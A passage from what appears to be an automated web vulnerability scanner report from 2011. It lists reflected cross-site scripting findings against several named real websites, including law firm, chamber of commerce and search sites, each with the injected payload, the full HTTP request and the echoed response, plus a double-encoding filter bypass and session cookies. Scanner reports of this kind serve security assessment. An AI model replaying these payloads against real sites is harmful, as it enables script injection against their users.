<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="/chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.aspindex.php?src=gendocs&ref=ERROR&link=ERROR&login=">
...[SNIP]...

4.104. http://www.dcchamber.org/chamber/memberDetail.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber/memberDetail.asp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12668"><script>alert(1)</script>2f451230e52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52 HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:48:20 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=pkp73ol8c1315pd6btr3ijgkr3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="/chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52index.php?src=gendocs&ref=ERROR&link=ERROR&login=">
...[SNIP]...

4.105. http://www.dcregistry.com/cgi-bin/classifieds/classifieds.cgi [db parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcregistry.com
Path:   /cgi-bin/classifieds/classifieds.cgi

Issue detail

The value of the db request parameter is copied into the HTML document as plain text between tags. The payload e00cf<script>alert(1)</script>182e67954d6 was submitted in the db parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/classifieds/classifieds.cgi?db=rentalse00cf<script>alert(1)</script>182e67954d6 HTTP/1.1
Host: www.dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:48:03 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 528

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/rentalse00cf<script>alert(1)</script>182e67954d6.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s
...[SNIP]...

4.106. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45f31'><script>alert(1)</script>f88730a84f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=wiqyja45mfzer0uwjqmgms45; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<a href='showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1&PrintPage=True'>
...[SNIP]...

4.107. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a79d'-alert(1)-'f0c22b0c26f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=xxbjjcegd5hxmw55jxay4l3b; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<350)
{
   location.href='showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1&mobile=True'
}

</script>
...[SNIP]...

4.108. http://www.fulbright.com/index.cfm [eTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the eTitle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>288abb3048 was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E94895"><script>alert(1)</script>288abb3048 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A16%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D369%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:16 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?ETITLE=Washington, D.C.94895"><script>alert(1)</script>288abb3048&FUSEACTION=correspondence.emailform&SITE_ID=299&pf=y">
...[SNIP]...

4.109. http://www.fulbright.com/index.cfm [eTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the eTitle request parameter is copied into the HTML document as plain text between tags. The payload 8d254<script>alert(1)</script>39610b88ceb was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E8d254<script>alert(1)</script>39610b88ceb HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D395%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="">Washington, D.C.8d254<script>alert(1)</script>39610b88ceb</a>
...[SNIP]...

4.110. http://www.fulbright.com/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145fe"><script>alert(1)</script>aed5c335ef1 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site145fe"><script>alert(1)</script>aed5c335ef1&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D210%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:00 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FUSEACTION=news.site145fe"><script>alert(1)</script>aed5c335ef1&SITE_ID=299&pf=y">
...[SNIP]...

4.111. http://www.fulbright.com/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the fuseaction request parameter is copied into the HTML document as plain text between tags. The payload 6f457<script>alert(1)</script>e9f570c8d27 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site6f457<script>alert(1)</script>e9f570c8d27&site_id=299 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D218%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
</h2>
                                   
           I received a fuseaction called "news.site6f457<script>alert(1)</script>e9f570c8d27" I don't know what to do with!<br>
...[SNIP]...

4.112. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed44"><script>alert(1)</script>c707a822c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=news.site&site_id=299&fed44"><script>alert(1)</script>c707a822c6a=1 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A39%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D575%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FED44"><SCRIPT>ALERT(1)</SCRIPT>C707A822C6A=1&FUSEACTION=news.site&SITE_ID=299&pf=y">
...[SNIP]...

4.113. http://www.fulbright.com/index.cfm [pf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the pf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 660d3"><script>alert(1)</script>39aa8a72e69 was submitted in the pf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?FUSEACTION=home.299&pf=y660d3"><script>alert(1)</script>39aa8a72e69 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D161%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="/index.cfm?FUSEACTION=home.299&PF=y660d3"><script>alert(1)</script>39aa8a72e69&pf=y">
...[SNIP]...

4.114. http://www.fulbright.com/index.cfm [rss parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the rss request parameter is copied into the value of an XML tag attribute which is encapsulated in double quotation marks. The payload 1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 was submitted in the rss parameter. This input was echoed as 1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /index.cfm?fuseaction=news.allrss&site_id=286&rss=y1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A44%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D626%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:44 GMT;path=/
Content-Type: text/xml

<html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


        -
       


...[SNIP]...
<a href="/index.cfm?FUSEACTION=news.allrss&RSS=y1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731&SITE_ID=286&pf=y">
...[SNIP]...

4.115. http://www.google.com/search [tch parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The value of the tch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39b16(a)5ca85e9080f was submitted in the tch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?sclient=psy&hl=en&q=washington%2C+dc+law+office&aq=f&aqi=&aql=&oq=&pbx=1&fp=f478bdfafcb0c911&tch=139b16(a)5ca85e9080f&ech=1&psi=WP42TYixLcOclgf_yNGIAw12954497006263 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=washington%2C+dc+law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: GeNLY2f-
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Wed, 19 Jan 2011 15:17:55 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 54477

MsNN-Rbk....S....Y..D.....9....X./<!doctype html><title>washington, dc law office. ...=var je=parent.google.j;var _loc='#'+location.href.substr(location.href.indexOf('?')+1);var _ss=je.ss;je.bv&&je.bv
...[SNIP]...
x3dpsy\\x26amp;hl\\x3den\\x26amp;q\\x3dwashington%2C+dc+law+office\\x26amp;aq\\x3df\\x26amp;aqi\\x3d\\x26amp;aql\\x3d\\x26amp;oq\\x3d\\x26amp;pbx\\x3d1\\x26amp;fp\\x3df478bdfafcb0c911\\x26amp;tch\\x3d139b16(a)5ca85e9080f\\x26amp;ech\\x3d1\\x26amp;psi\\x3dWP42TYixLcOclgf_yNGIAw12954497006263\x27)});});r();var l\x3dwindow.location.hashC:.N.Q\x27#\x27)):\x27#\x27;if(l\x3d\x3d\x27#\x27\x26\x26google.defre){google.defre\x3
...[SNIP]...

4.116. http://www.info.com/washington%20dc%20law%20firms [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.info.com
Path:   /washington%20dc%20law%20firms

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 was submitted in the REST URL parameter 1. This input was echoed as 2ee2d<script>alert(1)</script>72356283334 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /washington%20dc%20law%20firms2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.219CKMLO; path=/
Date: Wed, 19 Jan 2011 16:48:16 GMT
Server: Apache
Set-Cookie: b=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1295455696+last_cmp++engineset; expires=Sun, 18-Jan-2037 23:56:12 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39615

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms2ee2d%3cscript%3ealert%281%29%3c%2fscript%3e72356283334 - www.Info.com</title><l
...[SNIP]...
<a href="http://Info.com/searchw?qkw=washington+dc+law+firms+2ee2d%3Cscript%3Ealert%281%29%3C%2Fscript%3E72356283334&r_cop=spell" style="text-decoration:underline">washington dc law firms 2ee2d<script>alert(1)</script>72356283334</a>
...[SNIP]...

4.117. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d512'-alert(1)-'f727d73fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2d512'-alert(1)-'f727d73fb9=1 HTTP/1.1
Host: www.jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:51:57 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
